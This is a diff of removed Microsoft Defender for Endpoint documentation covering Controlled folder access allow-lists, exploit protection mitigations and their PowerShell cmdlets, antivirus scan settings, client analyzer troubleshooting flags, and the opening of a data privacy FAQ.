-An allowed application or service only has write access to a controlled folder after it starts. For example, an update service will continue to trigger events after it's allowed until it is stopped and restarted.
-
-### Use the Windows Defender Security app to allow specific apps
-
-1. Open the Windows Security app by searching the start menu for **Security**.
-
-2. Select the **Virus & threat protection** tile (or the shield icon on the left menu bar) and then select **Manage ransomware protection**.
-
-3. Under the **Controlled folder access** section, select **Allow an app through Controlled folder access**
-
-4. Select **Add an allowed app** and follow the prompts to add apps.
-
- :::image type="content" source="media/cfa-allow-app.png" alt-text="The Add an allowed app button" lightbox="media/cfa-allow-app.png":::
-
-### Use Group Policy to allow specific apps
-
-1. On your Group Policy management device, open the [Group Policy Management Console](/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc731212(v=ws.11)?preserve=true), right-click the Group Policy Object you want to configure and select **Edit**.
-
-2. In the **Group Policy Management Editor**, go to **Computer configuration** and select **Administrative templates**.
-
-3. Expand the tree to **Windows components** \> **Microsoft Defender Antivirus** \> **Windows Defender Exploit Guard** \> **Controlled folder access**.
-
-4. Double-click the **Configure allowed applications** setting and then set the option to **Enabled**. Select **Show**.
-
-5. Add the full path to the executable in **Value name**. Set **Value** to `0`. For example, to allow the Command Prompt set **Value name** as `C:\Windows\System32\cmd.exe`. **Value** should be set to `0`.
-
-### Use PowerShell to allow specific apps
-
-1. Type **PowerShell** in the Start menu, right-click **Windows PowerShell** and then select **Run as administrator**
-2. Enter the following cmdlet:
-
- ```PowerShell
- Add-MpPreference -ControlledFolderAccessAllowedApplications "<the app that should be allowed, including the path>"
- ```
-
- For example, to add the executable *test.exe* located in the folder *C:\apps*, the cmdlet would be as follows:
-
- ```PowerShell
- Add-MpPreference -ControlledFolderAccessAllowedApplications "c:\apps\test.exe"
- ```
-
- Continue to use `Add-MpPreference -ControlledFolderAccessAllowedApplications` to add more apps to the list. Apps added using this cmdlet will appear in the Windows Security app.
-
- :::image type="content" source="medilet to allow an application" lightbox="media/cfa-allow-app-ps.png":::
-
-> [!IMPORTANT]
-> Use `Add-MpPreference` to append or add apps to the list. Using the `Set-MpPreference` cmdlet will overwrite the existing list.
-
-### Use MDM CSPs to allow specific apps
-
-Use the [./Vendor/MSFT/Policy/Config/Defender/ControlledFolderAccessAllowedApplications](/windows/client-management/mdm/policy-csp-defender#defender-guardedfoldersallowedapplications) configuration service provider (CSP) to allow apps to make changes to protected folders.
-
-## Allow signed executable files to access protected folders
-
-Microsoft Defender for Endpoint certificate and file indicators can allow signed executable files to access protected folders. For implementation details, see [Create indicators based on certificates](indicator-certificates.md).
-
-> [!Note]
-> This does no apply to scripting engines, including Powershell
-
-## Customize the notification
-
-For more information about customizing the notification when a rule is triggered and blocks an app or file, see [Configure alert notifications in Microsoft Defender for Endpoint](configure-email-notifications.md).
-
-## See also
--- [Protect important folders with controlled folder access](controlled-folders.md)-- [Enable controlled folder access](enable-controlled-folders.md)-- [Enable attack surface reduction rules](enable-attack-surface-reduction.md)
security Customize Exploit Protection https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/customize-exploit-protection.md
- Title: Customize exploit protection
-description: You can enable or disable specific mitigations used by exploit protection using the Windows Security app or PowerShell. You can also audit mitigations and export configurations.
---------- m365-security-- tier2-- mde-asr Previously updated : 08/09/2022--
-# Customize exploit protection
-
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-assignaccess-abovefoldlink)
-
-Exploit protection automatically applies a number of exploit mitigation techniques on both the operating system processes and on individual apps.
-
-Configure these settings using the Windows Security app on an individual device. Then, export the configuration as an XML file so you can deploy to other devices. Use Group Policy to distribute the XML file to multiple devices at once. You can also configure the mitigations with PowerShell.
-
-This article lists each of the mitigations available in exploit protection. It indicates whether the mitigation can be applied system-wide or to individual apps, and provides a brief description of how the mitigation works.
-
-It also describes how to enable or configure the mitigations using Windows Security, PowerShell, and mobile device management (MDM) configuration service providers (CSPs). This is the first step in creating a configuration that you can deploy across your network. The next step involves [generating, exporting, importing, and deploying the configuration to multiple devices](import-export-exploit-protection-emet-xml.md).
-
-> [!WARNING]
-> Some security mitigation technologies may have compatibility issues with some applications. You should test exploit protection in all target use scenarios by using [audit mode](evaluate-exploit-protection.md) before deploying the configuration across a production environment or the rest of your network.
-
-## Exploit protection mitigations
-
-All mitigations can be configured for individual apps. Some mitigations can also be applied at the operating system level.
-
-You can set each of the mitigations on, off, or to their default value. Some mitigations have additional options that are indicated in the description in the table.
-
-Default values are always specified in brackets at the **Use default** option for each mitigation. In the following example, the default for Data Execution Prevention is "On".
-
-The **Use default** configuration for each of the mitigation settings indicates our recommendation for a base level of protection for everyday usage for home users. Enterprise deployments should consider the protection required for their individual needs and may need to modify configuration away from the defaults.
-
-For the associated PowerShell cmdlets for each mitigation, see the [PowerShell reference table](#cmdlets-table) at the bottom of this article.
-
-|Mitigation|Description|Can be applied to|Audit mode available|
-|||||
-|Control flow guard (CFG)|Ensures control flow integrity for indirect calls. Can optionally suppress exports and use strict CFG.|System and app-level|No|
-|Data Execution Prevention (DEP)|Prevents code from being run from data-only memory pages such as the heap and stacks. Only configurable for 32-bit (x86) apps, permanently enabled for all other architectures. Can optionally enable ATL thunk emulation.|System and app-level|No|
-|Force randomization for images (Mandatory ASLR)|Forcibly relocates images not compiled with /DYNAMICBASE. Can optionally fail loading images that don't have relocation information.|System and app-level|No|
-|Randomize memory allocations (Bottom-Up ASLR)|Randomizes locations for virtual memory allocations. It includes system structure heaps, stacks, TEBs, and PEBs. Can optionally use a wider randomization variance for 64-bit processes.|System and app-level|No|
-|Validate exception chains (SEHOP)|Ensures the integrity of an exception chain during exception dispatch. Only configurable for 32-bit (x86) applications.|System and app-level|No|
-|Validate heap integrity|Terminates a process when heap corruption is detected.|System and app-level|No|
-|Arbitrary code guard (ACG)|Prevents the introduction of non-image-backed executable code and prevents code pages from being modified. Can optionally allow thread opt-out and allow remote downgrade (configurable only with PowerShell).|App-level only|Yes|
-|Block low integrity images|Prevents the loading of images marked with Low Integrity.|App-level only|Yes|
-|Block remote images|Prevents loading of images from remote devices.|App-level only|No|
-|Block untrusted fonts|Prevents loading any GDI-based fonts not installed in the system fonts directory, notably fonts from the web.|App-level only|Yes|
-|Code integrity guard|Restricts loading of images signed by Microsoft, WHQL, or higher. Can optionally allow Microsoft Store signed images.|App-level only|Yes|
-|Disable extension points|Disables various extensibility mechanisms that allow DLL injection into all processes, such as AppInit DLLs, window hooks, and Winsock service providers.|App-level only|No|
-|Disable Win32k system calls|Prevents an app from using the Win32k system call table.|App-level only|Yes|
-|Don't allow child processes|Prevents an app from creating child processes.|App-level only|Yes|
-|Export address filtering (EAF)|Detects dangerous operations being resolved by malicious code. Can optionally validate access by modules commonly used by exploits.|App-level only|Yes|
-|Import address filtering (IAF)|Detects dangerous operations being resolved by malicious code.|App-level only|Yes|
-|Simulate execution (SimExec)|Ensures that calls to sensitive APIs return to legitimate callers. Only configurable for 32-bit (x86) applications. Not compatible with ACG.|App-level only|Yes|
-|Validate API invocation (CallerCheck)|Ensures that sensitive APIs are invoked by legitimate callers. Only configurable for 32-bit (x86) applications. Not compatible with ACG|App-level only|Yes|
-|Validate handle usage|Causes an exception to be raised on any invalid handle references.|App-level only|No|
-|Validate image dependency integrity|Enforces code signing for Windows image dependency loading.|App-level only|No|
-|Validate stack integrity (StackPivot)|Ensures that the stack hasn't been redirected for sensitive APIs. Not compatible with ACG.|App-level only|Yes|
-
-> [!IMPORTANT]
-> If you add an app to the **Program settings** section and configure individual mitigation settings there, they will be honored above the configuration for the same mitigations specified in the **System settings** section. The following matrix and examples help to illustrate how defaults work:
->
-> |Enabled in **Program settings**|Enabled in **System settings**|Behavior|
-> ||||
-> |Yes|No|As defined in **Program settings**|
-> |Yes|Yes|As defined in **Program settings**|
-> |No|Yes|As defined in **System settings**|
-> |No|No|Default as defined in **Use default** option|
->
-> - **Example 1**
-> Mikael configures **Data Execution Prevention (DEP)** in the **System settings** section to be **Off by default**. Mikael then adds the app *test.exe* to the **Program settings** section. In the options for that app, under **Data Execution Prevention (DEP)**, he enables the **Override system settings** option and sets the switch to **On**. There are no other apps listed in the **Program settings** section. The result will be that DEP only will be enabled for *test.exe*. All other apps will not have DEP applied.
->
-> - **Example 2**
-> Josie configures **Data Execution Prevention (DEP)** in the **System settings** section to be **Off by default**. Josie then adds the app *test.exe* to the **Program settings** section. In the options for that app, under **Data Execution Prevention (DEP)**, she enables the **Override system settings** option and sets the switch to **On**. Josie also adds the app *miles.exe* to the **Program settings** section and configures **Control flow guard (CFG)** to **On**. She doesn't enable the **Override system settings** option for DEP or any other mitigations for that app. The result will be that DEP will be enabled for *test.exe*. DEP will not be enabled for any other app, including *miles.exe*. CFG will be enabled for *miles.exe*.
-
-> [!NOTE]
-> If you have found any issues in this article, you can report it directly to a Windows Server/Windows Client partner or use the Microsoft technical support numbers for your country/region.
-
-### Configure system-level mitigations with the Windows Security app
-
-1. Open the Windows Security app by selecting the shield icon in the task bar or searching the start menu for **Windows Security**.
-
-2. Select the **App & browser control** tile (or the app icon on the left menu bar) and then select **Exploit protection**.
-
-3. Under the **System settings** section, find the mitigation you want to configure and select one of the following. Apps that aren't configured individually in the **Program settings** section will use the settings configured here:
- - **On by default** - The mitigation is *enabled* for apps that don't have this mitigation set in the app-specific **Program settings** section
- - **Off by default** - The mitigation is *disabled* for apps that don't have this mitigation set in the app-specific **Program settings** section
- - **Use default** - The mitigation is either enabled or disabled, depending on the default configuration that is set up by Windows 10 or Windows 11 installation; the default value (**On** or **Off**) is always specified next to the **Use default** label for each mitigation
-
- > [!NOTE]
- > You may see a User Account Control window when changing some settings. Enter administrator credentials to apply the setting.
-
- Changing some settings may require a restart.
-
-4. Repeat this for all the system-level mitigations you want to configure.
-
-5. Go to the **Program settings** section and choose the app you want to apply mitigations to:
-
- 1. If the app you want to configure is already listed, select it and then select **Edit**
- 2. If the app isn't listed, at the top of the list select **Add program to customize** and then choose how you want to add the app:
- - Use **Add by program name** to have the mitigation applied to any running process with that name. You must specify a file with an extension. You can enter a full path to limit the mitigation to only the app with that name in that location.
- - Use **Choose exact file path** to use a standard Windows Explorer file picker window to find and select the file you want.
-
-6. After selecting the app, you'll see a list of all the mitigations that can be applied. To enable the mitigation, select the check box and then change the slider to **On**. Select any additional options. Choosing **Audit** will apply the mitigation in audit mode only. You will be notified if you need to restart the process or app, or if you need to restart Windows.
-
-7. Repeat these steps for all the apps and mitigations you want to configure. Select **Apply** when you're done setting up your configuration.
-
-You can now [export these settings as an XML file](import-export-exploit-protection-emet-xml.md) or continue on to configure app-specific mitigations.
-
-Exporting the configuration as an XML file allows you to copy the configuration from one device onto other devices.
-
-## PowerShell reference
-
-You can use the Windows Security app to configure Exploit protection, or you can use PowerShell cmdlets.
-
-The configuration settings that were most recently modified will always be applied - regardless of whether you use PowerShell or Windows Security. This means that if you use the app to configure a mitigation, then use PowerShell to configure the same mitigation, the app will update to show the changes you made with PowerShell. If you were to then use the app to change the mitigation again, that change would apply.
-
-> [!IMPORTANT]
-> Any changes that are deployed to a device through Group Policy will override the local configuration. When setting up an initial configuration, use a device that will not have a Group Policy configuration applied to ensure your changes aren't overridden.
-
-You can use the PowerShell verb `Get` or `Set` with the cmdlet `ProcessMitigation`. Using `Get` will list the current configuration status of any mitigations that have been enabled on the device - add the `-Name` cmdlet and app exe to see mitigations for just that app:
-
-```PowerShell
-Get-ProcessMitigation -Name processName.exe
-```
-
-> [!IMPORTANT]
-> System-level mitigations that have not been configured will show a status of `NOTSET`.
->
-> For system-level settings, `NOTSET` indicates the default setting for that mitigation has been applied.
->
-> For app-level settings, `NOTSET` indicates the system-level setting for the mitigation will be applied.
->
-> The default setting for each system-level mitigation can be seen in the Windows Security.
-
-Use `Set` to configure each mitigation in the following format:
-
-```PowerShell
-Set-ProcessMitigation -<scope> <app executable> -<action> <mitigation or options>,<mitigation or options>,<mitigation or options>
-```
-
-Where:
--- \<Scope\>:
- - `-Name` to indicate the mitigations should be applied to a specific app. Specify the app's executable after this flag.
- - `-System` to indicate the mitigation should be applied at the system level
-- \<Action\>:
- - `-Enable` to enable the mitigation
- - `-Disable` to disable the mitigation
-- \<Mitigation\>:
- - The mitigation's cmdlet as defined in the [mitigation cmdlets table](#cmdlets-table) below, along with any suboptions (surrounded with spaces). Each mitigation is separated with a comma.
-
-For example, to enable the Data Execution Prevention (DEP) mitigation with ATL thunk emulation and for an executable called *testing.exe* in the folder *C:\Apps\LOB\tests*, and to prevent that executable from creating child processes, you'd use the following command:
-
-```PowerShell
-Set-ProcessMitigation -Name c:\apps\lob\tests\testing.exe -Enable DEP, EmulateAtlThunks, DisallowChildProcessCreation
-```
-
-> [!IMPORTANT]
-> Separate each mitigation option with commas.
-
-If you wanted to apply DEP at the system level, you'd use the following command:
-
-```PowerShell
-Set-Processmitigation -System -Enable DEP
-```
-
-To disable mitigations, you can replace `-Enable` with `-Disable`. However, for app-level mitigations, this will force the mitigation to be disabled only for that app.
-
-If you need to restore the mitigation back to the system default, you need to include the `-Remove` cmdlet as well, as in the following example:
-
-```PowerShell
-Set-Processmitigation -Name test.exe -Remove -Disable DEP
-```
-
-You can also set some mitigations to audit mode. Instead of using the PowerShell cmdlet for the mitigation, use the **Audit mode** cmdlet as specified in the [mitigation cmdlets table](#cmdlets-table) below.
-
-For example, to enable Arbitrary Code Guard (ACG) in audit mode for the *testing.exe* used previously, you'd use the following command:
-
-```PowerShell
-Set-ProcessMitigation -Name c:\apps\lob\tests\testing.exe -Enable AuditDynamicCode
-```
-
-You can disable audit mode by using the same command but replacing `-Enable` with `-Disable`.
-
-### PowerShell reference table
-
-This table lists the PowerShell cmdlets (and associated audit mode cmdlet) that can be used to configure each mitigation.
-
-<a id="cmdlets-table"></a>
-
-|Mitigation|Applies to|PowerShell cmdlets|Audit mode cmdlet|
-|||||
-|Control flow guard (CFG)|System and app-level|CFG, StrictCFG, SuppressExports|Audit not available|
-|Data Execution Prevention (DEP)|System and app-level|DEP, EmulateAtlThunks|Audit not available|
-|Force randomization for images (Mandatory ASLR)|System and app-level|ForceRelocateImages|Audit not available|
-|Randomize memory allocations (Bottom-Up ASLR)|System and app-level|BottomUp, HighEntropy|Audit not available|
-|Validate exception chains (SEHOP)|System and app-level|SEHOP, SEHOPTelemetry|Audit not available|
-|Validate heap integrity|System and app-level|TerminateOnError|Audit not available|
-|Arbitrary code guard (ACG)|App-level only|DynamicCode|AuditDynamicCode|
-|Block low integrity images|App-level only|BlockLowLabel|AuditImageLoad|
-|Block remote images|App-level only|BlockRemoteImages|Audit not available|
-|Block untrusted fonts|App-level only|DisableNonSystemFonts|AuditFont, FontAuditOnly|
-|Code integrity guard|App-level only|BlockNonMicrosoftSigned, AllowStoreSigned|AuditMicrosoftSigned, AuditStoreSigned|
-|Disable extension points|App-level only|ExtensionPoint|Audit not available|
-|Disable Win32k system calls|App-level only|DisableWin32kSystemCalls|AuditSystemCall|
-|Do not allow child processes|App-level only|DisallowChildProcessCreation|AuditChildProcess|
-|Export address filtering (EAF)|App-level only|EnableExportAddressFilterPlus, EnableExportAddressFilter <a href="#r1" id="t1">\[1\]</a>|Audit not available<a href="#r2" id="t2">\[2\]</a>|
-|Import address filtering (IAF)|App-level only|EnableImportAddressFilter|Audit not available<a href="#r2" id="t2">\[2\]</a>|
-|Simulate execution (SimExec)|App-level only|EnableRopSimExec|Audit not available<a href="#r2" id="t2">\[2\]</a>|
-|Validate API invocation (CallerCheck)|App-level only|EnableRopCallerCheck|Audit not available<a href="#r2" id="t2">\[2\]</a>|
-|Validate handle usage|App-level only|StrictHandle|Audit not available|
-|Validate image dependency integrity|App-level only|EnforceModuleDepencySigning|Audit not available|
-|Validate stack integrity (StackPivot)|App-level only|EnableRopStackPivot|Audit not available<a href="#r2" id="t2">\[2\]</a>|
-
-<a href="#t1" id="r1">\[1\]</a>: Use the following format to enable EAF modules for dlls for a process:
-
-```PowerShell
-Set-ProcessMitigation -Name processName.exe -Enable EnableExportAddressFilterPlus -EAFModules dllName1.dll,dllName2.dll
-```
-
-<a href="#t2" id="r2">\[2\]</a>: Audit for this mitigation is not available via PowerShell cmdlets.
-
-## Customize the notification
-
-For more information about customizing the notification when a rule is triggered and blocks an app or file, see [Windows Security](/windows/security/threat-protection/windows-defender-security-center/windows-defender-security-center).
-
-## See also
--- [Protect devices from exploits](exploit-protection.md)-- [Evaluate exploit protection](evaluate-exploit-protection.md)-- [Enable exploit protection](enable-exploit-protection.md)-- [Import, export, and deploy exploit protection configurations](import-export-exploit-protection-emet-xml.md)
security Customize Run Review Remediate Scans Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/customize-run-review-remediate-scans-microsoft-defender-antivirus.md
- Title: Run and customize scheduled and on-demand scans
-description: Customize and initiate Microsoft Defender Antivirus scans on endpoints across your network
---- Previously updated : 02/27/2024------- m365-security-- tier2-- mde-ngp--
-# Customize, initiate, and review the results of Microsoft Defender Antivirus scans and remediation
---
-**Applies to:**
--- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- Microsoft Defender for Business-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- Microsoft Defender Antivirus-
-You can use Group Policy, PowerShell, and Windows Management Instrumentation (WMI) to configure Microsoft Defender Antivirus scans.
-
-Article | Description
-|
-[Configure and validate file, folder, and process-opened file exclusions in Microsoft Defender Antivirus scans](configure-exclusions-microsoft-defender-antivirus.md) | You can exclude files (including files modified by specified processes) and folders from on-demand scans, scheduled scans, and always-on real-time protection monitoring and scanning
-[Configure Microsoft Defender Antivirus scanning options](configure-advanced-scan-types-microsoft-defender-antivirus.md) | You can configure Microsoft Defender Antivirus to include certain types of email storage files, back-up or reparse points, and archived files (such as .zip files) in scans. You can also enable network file scanning
-[Configure remediation for scans](configure-remediation-microsoft-defender-antivirus.md) | Configure what Microsoft Defender Antivirus should do when it detects a threat, and how long quarantined files should be retained in the quarantine folder
-[Configure scheduled scans](scheduled-catch-up-scans-microsoft-defender-antivirus.md) | Set up recurring (scheduled) scans, including when they should run and whether they run as full or quick scans
-[Configure and run scans](run-scan-microsoft-defender-antivirus.md) | Run and configure on-demand scans using PowerShell, Windows Management Instrumentation, or individually on endpoints with the Windows Security app
-[Review scan results](review-scan-results-microsoft-defender-antivirus.md) | Review the results of scans using Microsoft Endpoint Configuration Manager, Microsoft Intune, or the Windows Security app
security Data Collection Analyzer https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/data-collection-analyzer.md
- Title: Data collection for advanced troubleshooting on Windows
-description: Learn how to use the client analyzer to collect data for complex troubleshooting scenarios.
--- NOCSH------ m365-security-- tier2-- mde-ngp-- Previously updated : 02/27/2024--
-# Data collection for advanced troubleshooting on Windows
-
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)--- Microsoft Defender for Business--- Microsoft Defender Antivirus-
-When collaborating with Microsoft support professionals, you might be asked to use the client analyzer to collect data for troubleshooting of more complex scenarios. The analyzer script supports other parameters for that purpose and can collect a specific log set based on the observed symptoms that need to be investigated.
-
-Run `MDEClientAnalyzer.cmd /?` to see the list of available parameters and their description:
--
-| Switch | Description | When to use| Process that you're troubleshooting. |
-|:|:|:|:|
-|`-h` |Calls into [Windows Performance Recorder](/windows-hardware/test/wpt/wpr-command-line-options) to collect a verbose general performance trace in addition to the standard log set. |Slow application start/launch. When clicking on a button on the app, taking x seconds longer. |One of the following: <br/>- `MSSense.exe`<br/>- `MsSenseS.exe`<br/>- `SenseIR.exe`<br/>- `SenseNdr.exe`<br/>- `SenseTVM.exe`<br/>- `SenseAadAuthenticator.exe`<br/>- `SenseGPParser.exe`<br/>- `SenseImdsCollector.exe`<br/>- `SenseSampleUploader.exe` <br/>- `MsMpEng.exe` <br/>- `NisSrv.exe` |
-|`-l`|Calls into built-in [Windows Performance Monitor](/windows-server/remote/remote-desktop-services/rds-rdsh-performance-counters) to collect a lightweight perfmon trace. This scenario can be useful when diagnosing slow performance degradation issues that occur over time but hard to reproduce on demand. |Troubleshooting application performance that could be slow to reproduce (manifest) itself. We recommend capturing up to three minutes (at most five minutes), because your data set could get too large.|One of the following: <br/>- `MSSense.exe` <br/>- `MsSenseS.exe` <br/>- `SenseIR.exe`<br/>- `SenseNdr.exe` <br/>- `SenseTVM.exe`<br/>- `SenseAadAuthenticator.exe`<br/>- `SenseGPParser.exe`<br/>- `SenseImdsCollector.exe`<br/>- `SenseSampleUploader.exe`<br/>- `MsMpEng.exe`<br/>- `NisSrv.exe` |
-|`-c`|Calls into [process monitor](/sysinternals/downloads/procmon) for advanced monitoring of real-time file system, registry, and process/thread activity. This is especially useful when troubleshooting various application compatibility scenarios. |Process Monitor (ProcMon) to initiate a boot trace when investigating a driver or service or application startup delay related issue. Or applications hosted on a network share that aren't using SMB Opportunistic Locking (Oplock) properly causing application compatibility problems.|One of the following: <br/>- `MSSense.exe`<br/>- `MsSenseS.exe`<br/>- `SenseIR.exe`<br/>- `SenseNdr.exe`<br/>- `SenseTVM.exe`<br/>- `SenseAadAuthenticator.exe`<br/>- `SenseGPParser.exe`<br/>- `SenseImdsCollector.exe`<br/>- `SenseSampleUploader.exe`<br/>- `MsMpEng.exe`<br/>- `NisSrv.exe` |
-|`-i`|Calls into built-in [netsh.exe](/windows/win32/winsock/netsh-exe) command to start a network and Windows Firewall trace that is useful when troubleshooting various network-related issues. |When troubleshooting network related issues such as Defender for Endpoint EDR telemetry or CnC data submission issues. Microsoft Defender Antivirus Cloud Protection (MAPS) reporting issues. Network protection related issues, and so forth. |One of the following processes: <br/>- `MSSense.exe`<br/>- `MsSenseS.exe`<br/>- `SenseIR.exe`<br/>- `SenseNdr.exe`<br/>- `SenseTVM.exe`<br/>- `SenseAadAuthenticator.exe`<br/>- `SenseGPParser.exe`<br/>- `SenseImdsCollector.exe`<br/>- `SenseSampleUploader.exe`<br/>- `MsMpEng.exe`<br/>- `NisSrv.exe` |
-|`-b`|Same as `-c` but the process monitor trace will be initiated during next boot and stopped only when the -b is used again. |Process Monitor (ProcMon) to initiate a boot trace when investigating a driver or service or application startup delay related issue. This scenario can also be used to investigate a slow boot or slow sign-in.|One of the following processes: <br/>- `MSSense.exe`<br/>- `MsSenseS.exe`<br/>- `SenseIR.exe`<br/>- `SenseNdr.exe`<br/>- `SenseTVM.exe` <br/>- `SenseAadAuthenticator.exe`<br/>- `SenseGPParser.exe`<br/>- `SenseImdsCollector.exe`<br/>- `SenseSampleUploader.exe`<br/>- `MsMpEng.exe`<br/>- `NisSrv.exe` |
-|`-e`|Calls into [Windows Performance Recorder](/windows-hardware/test/wpt/wpr-command-line-options) to collect Defender AV Client tracing (AM-Engine and AM-Service) for analysis of Antivirus cloud connectivity issues. |When troubleshooting Cloud Protection (MAPS) reporting failures.|MsMpEng.exe |
-|`-a`|Calls into [Windows Performance Recorder](/windows-hardware/test/wpt/wpr-command-line-options) to collect a verbose performance trace specific to analysis of high CPU issues related to the antivirus process (MsMpEng.exe). |When troubleshooting high cpu utilization with Microsoft Defender Antivirus (Antimalware Service Executable or MsMpEng.exe) if you already used the Microsoft Defender Antivirus [Performance Analyzer](/microsoft-365/security/defender-endpoint/tune-performance-defender-antivirus) to narrow down the /path/process or /path or file extension contributing to the high cpu utilization. This scenario enables further investigate what the application or service is doing to contribute to the high cpu utilization.|MsMpEng.exe |
-|`-v`|Uses antivirus [MpCmdRun.exe command line argument](/windows/security/threat-protection/microsoft-defender-antivirus/command-line-arguments-microsoft-defender-antivirus) with most verbose -trace flags. |Anytime an advanced troubleshooting is needed. Such as when troubleshooting Cloud Protection (MAPS) reporting failures, Platform Update failures, Engine update failures, Security Intelligence Update failures, False negatives, etc. Can also be used with `-b`, `-c`, `-h`, or `-l`.|`MsMpEng.exe` |
-|`-t` |Starts verbose trace of all client-side components relevant to Endpoint DLP, which is useful for scenarios where [DLP actions](/microsoft-365/compliance/endpoint-dlp-learn-about#endpoint-activities-you-can-monitor-and-take-action-on) aren't happening as expected for files. |When running into issues where the Microsoft Endpoint Data Loss Prevention (DLP) actions expected aren't occurring.|`MpDlpService.exe` |
-|`-q`|Calls into DLPDiagnose.ps1 script from the analyzer `Tools` directory that validates the basic configuration and requirements for Endpoint DLP. |Checks the basic configuration and requirements for Microsoft Endpoint DLP|`MpDlpService.exe`|
-|`-d`|Collects a memory dump of `MsSenseS.exe` (the sensor process on Windows Server 2016 or older OS) and related processes. - \* This flag can be used with above mentioned flags. - \*\* Capturing a memory dump of [PPL protected processes](/windows-hardware/drivers/install/early-launch-antimalware) such as `MsSense.exe` or `MsMpEng.exe` isn't supported by the analyzer at this time.|On Windows 7 SP1, Windows 8.1, Windows Server 2008 R2, Windows Server 2012 R2 or Windows Server 2016 running w/ the MMA agent and having performance (high cpu or high memory usage) or application compatibility issues. |`MsSenseS.exe`|
-|`-z` |Configures registry keys on the machine to prepare it for full machine memory dump collection via [CrashOnCtrlScroll](/windows-hardware/drivers/debugger/forcing-a-system-crash-from-the-keyboard). This would be useful for analysis of computer freeze issues. \* Hold down the rightmost CTRL key, then press the SCROLL LOCK key twice. |Machine hanging or being unresponsive or slow. High memory usage (Memory leak): a) User mode: Private bytes b) Kernel mode: paged pool or nonpaged pool memory, handle leaks.|`MSSense.exe` or `MsMpEng.exe` |
-|`-k` |Uses [NotMyFault](/sysinternals/downloads/notmyfault) tool to force the system to crash and generate a machine memory dump. This would be useful for analysis of various OS stability issues. |Same as above.|`MSSense.exe` or `MsMpEng.exe` |
-
-The analyzer, and all of the scenario flags listed in this article, can be initiated remotely by running `RemoteMDEClientAnalyzer.cmd`, which is also bundled into the analyzer toolset:
--
-> [!NOTE]
-> When any advanced troubleshooting parameter is used, the analyzer also calls into [MpCmdRun.exe](/microsoft-365/security/defender-endpoint/command-line-arguments-microsoft-defender-antivirus) to collect Microsoft Defender Antivirus related support logs.
-> You can use `-g` flag to validate URLs for a specific datacenter region even without being onboarded to that region<br>
-> For example, `MDEClientAnalyzer.cmd -g EU` forces the analyzer to test cloud URLs in Europe region.
-
-## A few points to keep in mind
-
-When you use `RemoteMDEClientAnalyzer.cmd`, it calls into `psexec` to download the tool from the configured file share and then run it locally via `PsExec.exe`.
-
-The CMD script uses the `-r` flag to specify that it is running remotely within SYSTEM context, and so no prompt is presented to the user.
-
-That same flag can be used with `MDEClientAnalyzer.cmd` to avoid a prompt to the user to specify the number of minutes for data collection. For example, consider `MDEClientAnalyzer.cmd -r -i -m 5`.
--- `-r` indicates that tool is being run from remote (or non-interactive context).-- `-i` is the scenario flag for collection of network trace along with other related logs.-- `-m #` denotes the number of minutes to run (we used 5 minutes in our example).-
-When using `MDEClientAnalyzer.cmd`, the script checks for privileges using `net session`, which requires the service `Server` to be running. If it's not, you will get the error message _Script is running with insufficient privileges_. Run it with administrator privileges if ECHO is off.
-
security Data Storage Privacy https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/data-storage-privacy.md
- Title: Microsoft Defender for Endpoint data storage and privacy
-description: Learn about how Microsoft Defender for Endpoint handles privacy and data that it collects.
-keywords: Microsoft Defender for Endpoint, data storage and privacy, storage, privacy, licensing, geolocation, data retention, data
------- m365-security-- tier2-- essentials-privacy-- essentials-security-- essentials-compliance-- Previously updated : 08/07/2023--
-# Microsoft Defender for Endpoint data storage and privacy
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Business](../defender-business/mdb-overview.md)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-assignaccess-abovefoldlink)
-
-This section covers some of the most frequently asked questions regarding privacy and data handling for Defender for Endpoint.
-
-> [!NOTE]
-> This article explains the data storage and privacy details related to Defender for Endpoint and Defender for Business. For more information related to Defender for Endpoint and other products and services like Microsoft Defender Antivirus and Windows, see [Microsoft Privacy Statement](https://go.microsoft.com/fwlink/?linkid=827576), and also [Windows privacy FAQ](https://go.microsoft.com/fwlink/?linkid=827577).
-
-## What data does Microsoft Defender for Endpoint collect?
-
-Microsoft Defender for Endpoint collects information from your configured devices and stores it in a customer-dedicated and segregated tenant specific to the service for administration, tracking, and reporting purposes.
-
-Information collected includes file data (file names, sizes, and hashes), process data (running processes, hashes), registry data, network connection data (host IPs and ports), and device details (device identifiers, names, and the operating system version).
-
-Microsoft stores this data securely in Microsoft Azure and maintains it in accordance with Microsoft privacy practices and [Microsoft Trust Center policies](https://go.microsoft.com/fwlink/?linkid=827578).
-
-This data enables Defender for Endpoint to:
